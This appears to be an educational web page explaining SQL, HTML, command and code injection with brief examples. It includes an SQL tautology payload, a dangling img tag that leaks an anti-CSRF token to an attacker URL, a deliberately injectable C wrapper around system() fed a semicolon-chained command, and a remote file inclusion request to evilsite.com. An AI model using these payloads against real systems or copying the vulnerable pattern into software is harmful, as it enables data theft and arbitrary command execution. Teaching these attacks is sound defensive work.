Injection
Injection attacks occur when an attacker is able to send commands through a web server to a backend system, bypassing normal security controls and fooling the backend system into believing that the request came from the web server
SQL
SQL injections are the most common web hacking techniques. A SQL injection consists of injecting a malicious SQL statement in a web form to the SQL interpreter of the application.
Example
-- Smith' OR '1' = '1' results in SELECT * FROM users WHERE name = 'Smith' OR TRUE;, because the statement will always be true it will return all the entries from the users table.
HTML
HTML Injection is very similar to XSS. The injection attack is performed the same way, except the injected content is pure html tags, whereas XSS is a script.
HTML injection can result in changing the webpage and harming the reputation of the page, exfiltrating sensitive user data, exfiltrating anti-CSRF tokens, and exfiltrating passwords stored in the browser.
Examples
To exfiltrate an anti-CSRF token, the attacker may, for example, use a non-terminated <img> tag like <img src='http://example.com/record.php? – the lack of closing single quote causes the rest of the content to become part of the URL until another single quote is found. If valid code uses double quotes instead, the hidden input will be sent to attacker-controlled record.php script and recorded:
<img src='http://example.com/record.php?<input type="hidden" name="anti_xsrf" value="s74bogj63h">
Command
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
Examples
The following code is a wrapper around the UNIX command cat which prints the contents of a file to standard output. It is also injectable:
#include <stdio.h>
#include <unistd.h>
int main(int argc, char **argv) {
char cat[] = "cat ";
char *command;
size_t commandLength;
commandLength = strlen(cat) + strlen(argv[1]) + 1;
command = (char *) malloc(commandLength);
strncpy(command, cat, commandLength);
strncat(command, argv[1], (commandLength - strlen(cat)) );
system(command);
return (0);
}
Used normally, the output is simply the contents of the file requested:
$ ./catWrapper test.txt
testHowever, if we add a semicolon and another command to the end of this line, the command is executed by catWrapper with no complaint:
$ ./catWrapper "test.txt; ls"
test
test.txt
format.c
catWrapper*
a.out*If catWrapper had been set to have a higher privilege level than the standard user, arbitrary commands could be executed with that higher privilege.
Code
Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application. This type of attack exploits poor handling of untrusted data. These types of attacks are usually made possible due to a lack of proper input/output data validation, for example:
- allowed characters (standard regular expressions classes or custom)
- data format
- amount of expected data
Examples
If an application passes a parameter sent via a GET request to the PHP include() function with no input validation, the attacker may try to execute code other than what the developer had in mind.
The URL below passes a page name to the include() function.
http://testsite.com/index.php?page=contact.php
The file “evilcode.php” may contain, for example, the phpinfo() function which is useful for gaining information about the configuration of the environment in which the web service runs. An attacker can ask the application to execute their PHP code using the following request:
http://testsite.com/?page=http://evilsite.com/evilcode.php